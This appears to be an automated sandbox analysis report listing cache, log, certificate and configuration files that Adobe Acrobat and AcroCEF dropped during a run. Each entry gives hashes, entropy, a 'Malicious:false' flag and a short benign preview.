                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):291
                                                                        Entropy (8bit):5.194677142755587
                                                                        Encrypted:false
                                                                        SSDEEP:6:DymMBgq2PCHhJ2nKuAl9OmbnIFUt8Wym4hZmw+WymRJzkwOCHhJ2nKuAl9OmbjLJ:XDvBHAahFUt8g4h/+gb56HAaSJ
                                                                        MD5:5CBEF4AE78E6C0843E586112081F9E7F
                                                                        SHA1:2218B3C4527F6EF00EC99C2495B3F2D5461D87B2
                                                                        SHA-256:2E26C426853AE7B3C804D3686A3E54861671B892D44CE56A587CCBA39C8E132C
                                                                        SHA-512:954E2F42084FB478A1182BD9B69D6ED32D2828490EC9A2CEF41D9BBB2A3F25FEED2175802717E4317226CFBB873EA0D18F1FC56BDB75E38E8766AA693E05BE44
                                                                        Malicious:false
                                                                        Preview:2024/12/27-03:05:25.139 db0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/27-03:05:25.142 db0 Recovering log #3.2024/12/27-03:05:25.143 db0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):291
                                                                        Entropy (8bit):5.194677142755587
                                                                        Encrypted:false
                                                                        SSDEEP:6:DymMBgq2PCHhJ2nKuAl9OmbnIFUt8Wym4hZmw+WymRJzkwOCHhJ2nKuAl9OmbjLJ:XDvBHAahFUt8g4h/+gb56HAaSJ
                                                                        MD5:5CBEF4AE78E6C0843E586112081F9E7F
                                                                        SHA1:2218B3C4527F6EF00EC99C2495B3F2D5461D87B2
                                                                        SHA-256:2E26C426853AE7B3C804D3686A3E54861671B892D44CE56A587CCBA39C8E132C
                                                                        SHA-512:954E2F42084FB478A1182BD9B69D6ED32D2828490EC9A2CEF41D9BBB2A3F25FEED2175802717E4317226CFBB873EA0D18F1FC56BDB75E38E8766AA693E05BE44
                                                                        Malicious:false
                                                                        Preview:2024/12/27-03:05:25.139 db0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/27-03:05:25.142 db0 Recovering log #3.2024/12/27-03:05:25.143 db0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):338
                                                                        Entropy (8bit):5.205782061355466
                                                                        Encrypted:false
                                                                        SSDEEP:6:Dym8q2PCHhJ2nKuAl9Ombzo2jMGIFUt8WymYfZmw+WymrkwOCHhJ2nKuAl9Ombzz:X8vBHAa8uFUt8gYf/+gr56HAa8RJ
                                                                        MD5:18148EA0533B574EB48294A60A081CB9
                                                                        SHA1:81ACA6845CE00F27943F25F594D45F63E50A1498
                                                                        SHA-256:BE9476A25E9336C6D8BC0139DE1ACA4C8E1BC5FD3116FB63666D357A74340340
                                                                        SHA-512:9D07BF2FCCA929DF738C2C627A90D8D918E6F53D53484CC58317C8408C3E623C305C3F6B34051C0F4C395F2194AF717FA96CCDECE67B93362B6DEC8DA65B84AF
                                                                        Malicious:false
                                                                        Preview:2024/12/27-03:05:25.194 1da4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/27-03:05:25.197 1da4 Recovering log #3.2024/12/27-03:05:25.198 1da4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):338
                                                                        Entropy (8bit):5.205782061355466
                                                                        Encrypted:false
                                                                        SSDEEP:6:Dym8q2PCHhJ2nKuAl9Ombzo2jMGIFUt8WymYfZmw+WymrkwOCHhJ2nKuAl9Ombzz:X8vBHAa8uFUt8gYf/+gr56HAa8RJ
                                                                        MD5:18148EA0533B574EB48294A60A081CB9
                                                                        SHA1:81ACA6845CE00F27943F25F594D45F63E50A1498
                                                                        SHA-256:BE9476A25E9336C6D8BC0139DE1ACA4C8E1BC5FD3116FB63666D357A74340340
                                                                        SHA-512:9D07BF2FCCA929DF738C2C627A90D8D918E6F53D53484CC58317C8408C3E623C305C3F6B34051C0F4C395F2194AF717FA96CCDECE67B93362B6DEC8DA65B84AF
                                                                        Malicious:false
                                                                        Preview:2024/12/27-03:05:25.194 1da4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/27-03:05:25.197 1da4 Recovering log #3.2024/12/27-03:05:25.198 1da4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\78b4363b-6c9a-4515-aed5-247558c5b300.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:modified
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.956805546735883
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqXsBdOg2HMvAcaq3QYiub6P7E4TX:Y2sRdsBdMHO3QYhbS7n7
                                                                        MD5:EA44208546E1A4957EAEA7F44A0FA267
                                                                        SHA1:F57E8EA938752033F53D93F690B86F361EE463D5
                                                                        SHA-256:99E9621971263C3221E29F79EE9592B2535E5495913393F6F8CC99563342F059
                                                                        SHA-512:AEA5CC406FA09A5511A0FFFA7D8B540A2E256B9456606693C91C7D204E842BB74B3EE37831D2D9AF58CC1C39E966A381D51100AD8C8425968D0AC1E25B5C2CC1
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379846734345703","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":733347},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\87cfb67f-9520-45f3-a834-4d888f446f2f.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.963247713778661
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                        MD5:D46529E824E6E834D0D750C5560C136C
                                                                        SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                        SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                        SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.963247713778661
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                        MD5:D46529E824E6E834D0D750C5560C136C
                                                                        SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                        SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                        SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF70ac4c.TMP (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.963247713778661
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                        MD5:D46529E824E6E834D0D750C5560C136C
                                                                        SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                        SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                        SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):3878
                                                                        Entropy (8bit):5.237895754110011
                                                                        Encrypted:false
                                                                        SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+b1bpmuE:S43C4mS7fFi0KFYDjr3LWO3V3aw+b1bS
                                                                        MD5:C7013290A405ECC73D2C6BB1253576DA
                                                                        SHA1:ECCAA58D618907C64B603B281097E3D47C3C6F5F
                                                                        SHA-256:922C8EDEED2D5B2DE5F47D1D483EECCD8C4E7DFFB08F3D57E4638BAA093CA3AF
                                                                        SHA-512:D5DB5F97C2E2B4672D4A2ACED39CAEC654A19E49B9E3E159B2C07C0927AAEA0AE13720B1E5C03A791A95C4C81E892D3DBF2AE3FD6AD0E92C9852D56DCB8AC957
                                                                        Malicious:false
                                                                        Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):326
                                                                        Entropy (8bit):5.216566069790556
                                                                        Encrypted:false
                                                                        SSDEEP:6:DymkFmq2PCHhJ2nKuAl9OmbzNMxIFUt8Wym7oXZmw+Wym+O0kwOCHhJ2nKuAl9Ob:X1vBHAa8jFUt8gUX/+g+O056HAa84J
                                                                        MD5:178EDA9B08FD83DD366A765A7D7AAB06
                                                                        SHA1:D06192DB1A720623742ED0E9E8B2720E08ADF19B
                                                                        SHA-256:B78BCECA29C2BE0D87A5D1536F96BA32219DE592053FED9E78D79B4AB6739EF5
                                                                        SHA-512:E3B9F2C39EE602D676516D7035185967EBE190ED7493C008A2C497616F6886A4E42B115B47FF552053FDFCF30F2614804FF90D47E01D2806682C0AA629248184
                                                                        Malicious:false
                                                                        Preview:2024/12/27-03:05:25.478 1da4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-03:05:25.485 1da4 Recovering log #3.2024/12/27-03:05:25.490 1da4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):326
                                                                        Entropy (8bit):5.216566069790556
                                                                        Encrypted:false
                                                                        SSDEEP:6:DymkFmq2PCHhJ2nKuAl9OmbzNMxIFUt8Wym7oXZmw+Wym+O0kwOCHhJ2nKuAl9Ob:X1vBHAa8jFUt8gUX/+g+O056HAa84J
                                                                        MD5:178EDA9B08FD83DD366A765A7D7AAB06
                                                                        SHA1:D06192DB1A720623742ED0E9E8B2720E08ADF19B
                                                                        SHA-256:B78BCECA29C2BE0D87A5D1536F96BA32219DE592053FED9E78D79B4AB6739EF5
                                                                        SHA-512:E3B9F2C39EE602D676516D7035185967EBE190ED7493C008A2C497616F6886A4E42B115B47FF552053FDFCF30F2614804FF90D47E01D2806682C0AA629248184
                                                                        Malicious:false
                                                                        Preview:2024/12/27-03:05:25.478 1da4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-03:05:25.485 1da4 Recovering log #3.2024/12/27-03:05:25.490 1da4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241227080529Z-158.bmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PC bitmap, Windows 3.x format, 114 x -152 x 32, cbSize 69366, bits offset 54
                                                                        Category:dropped
                                                                        Size (bytes):69366
                                                                        Entropy (8bit):4.204910253269834
                                                                        Encrypted:false
                                                                        SSDEEP:768:4zt4+AlK+eorMFGWA30zBQED5mAG23BjHzbyPbC3UYGmWDf3cQHhhXNezmZ5GW7n:VXr+uED5mw3BjHzujComW3ZzZ5HFrsQ
                                                                        MD5:D50A539BB2E1D8B6A4598E2A639175D5
                                                                        SHA1:30A99829736A6B8A6E7F20E47BA37CCFD90F1CD0
                                                                        SHA-256:8FF4DB4C5ED4FF7CCB9FE3CB50C17105DA1F5F9EE557E2333DF1A7CBD23802DE
                                                                        SHA-512:2D3BDE6DC27F20C8F40BE5C9C7351D3A83D6A5DEE68D21AED77F5322D561F8843292498876F4B03E8774C1EA17E46485AC4C53E3074AA74AA6A652C95271EB95
                                                                        Malicious:false
                                                                        Preview:BM........6...(...r...h..... .....................................................................................................................................................................................................................................................................................................................................................................................mdl.ohn..............|..ohp.............yM..yN..........yM..{R..........UKT.2&0.D8A.............<08.I>F................................................................................................................................................................................................................................................................................................................................................................e[d.e\d.e\d.........f\d.e\e.f\d.....sD..sD..sD..uG......sD..rD..sD......E:C.&.$.&.$.*.).....(.%.&.%.'.$.?3=...................................

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:Certificate, Version=3
                                                                        Category:dropped
                                                                        Size (bytes):1391
                                                                        Entropy (8bit):7.705940075877404
                                                                        Encrypted:false
                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                        Malicious:false
                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):71954
                                                                        Entropy (8bit):7.996617769952133
                                                                        Encrypted:true
                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                        Malicious:false
                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):192
                                                                        Entropy (8bit):2.723752989961514
                                                                        Encrypted:false
                                                                        SSDEEP:3:kkFklQzh+EttfllXlE/HT8kHvNNX8RolJuRdxLlGB9lQRYwpDdt:kKJzh+EteT82NMa8RdWBwRd
                                                                        MD5:255D771EAC7917168171500C38BC305C
                                                                        SHA1:52C2ED35CFCFD0F4622CC1283ABE89F622F19F1E
                                                                        SHA-256:A7D93E995AB4FC3AB33F5CF6DB79D3AC437D303CAD422EC153635AF4BF9E4E4D
                                                                        SHA-512:BBE2BA386A25852E8E44571BDE2BA6530B0C19CE41C14A8948B7BFCE82623EDD704D8DA4489E3D6D5348B961290A61BA01A33F261AA92B2EC5B5195EFD46190C
                                                                        Malicious:false
                                                                        Preview:p...... ........c...6X..(....................................................... ..........W....u...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):328
                                                                        Entropy (8bit):3.2335992211078866
                                                                        Encrypted:false
                                                                        SSDEEP:6:kKlL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:sDImsLNkPlE99SNxAhUe/3
                                                                        MD5:E561BC4FBECAB13826360E9905C530E5
                                                                        SHA1:2A051DDD9891A8223D45AAEE466C8C31B0E22997
                                                                        SHA-256:480E3A281CD4FBB2F85F1797E283CDC84F78973B3B68E14CD70703DA27CA3417
                                                                        SHA-512:23C4A90A6ED4CF7CBF817C46B99EA750B1A4C449EAE995E41769D7DA6C242CB62F85B42060318845614F99F2E593781ADBB6A8A9ABADCA96A476DD31DE50AA6D
                                                                        Malicious:false
                                                                        Preview:p...... ........$../6X..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):295
                                                                        Entropy (8bit):5.3666757084134
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJM3g98kUwPeUkwRe9:YvXKX7PJSvR/ZwHAz9GMbLUkee9
                                                                        MD5:FC4C2513B44CB5DB51BD59D6279003C0
                                                                        SHA1:9E31A8DE5DFDA3772D69117A1AF8F7AEB2E965F1
                                                                        SHA-256:A2CA77068B4729DD8D5163856BD09AB2A04F802ADBF5128B9F2E06694262F26B
                                                                        SHA-512:43BE3009180E0324F6B8DA9257A93F7F76456EF075DAE46CA7B71CD18619935DA725B117E65684E38D89C48CE2E05BA3B8BB14909EDF3C196E6DE30D9C8E1F8B
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.302189309078057
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfBoTfXpnrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GWTfXcUkee9
                                                                        MD5:91DDA120A2F19EC522B0E8C44083C4E6
                                                                        SHA1:E3411E82157DEAF46F4EE8FC98B8602E8FE67D5F
                                                                        SHA-256:DF2B11A556EEDDEB11D1CC52D733A37276240CAE2A7A21882011E60702E0E8B9
                                                                        SHA-512:933762A77B154E98D464BF9EE744D34D54E8F838B71BEB1931C3ABBACD8976518CFBB3353F6116D9535E7AEAE5DDD051110D97169FABB6FD07C8357D685D0961
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.2800394026551265
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfBD2G6UpnrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GR22cUkee9
                                                                        MD5:C9AC3518D7628623F6ADE7FBEE9A4390
                                                                        SHA1:AFF3EE21221293E7ED375DF17CA31802DAC424B0
                                                                        SHA-256:E2816C91418AD455A0B66C1E9E1E6AAB41C39D65CC9987168436FE6C7032DADD
                                                                        SHA-512:1AAC08CC8D7D547546FB5CDDEEEA4169AEABB7EED0D4ADAB644563D2673C98B0FD394CC8639074ED411D5F5B6A1B27A90888865AF779152E21520CD75F7C3661
                                                                        Malicious:false
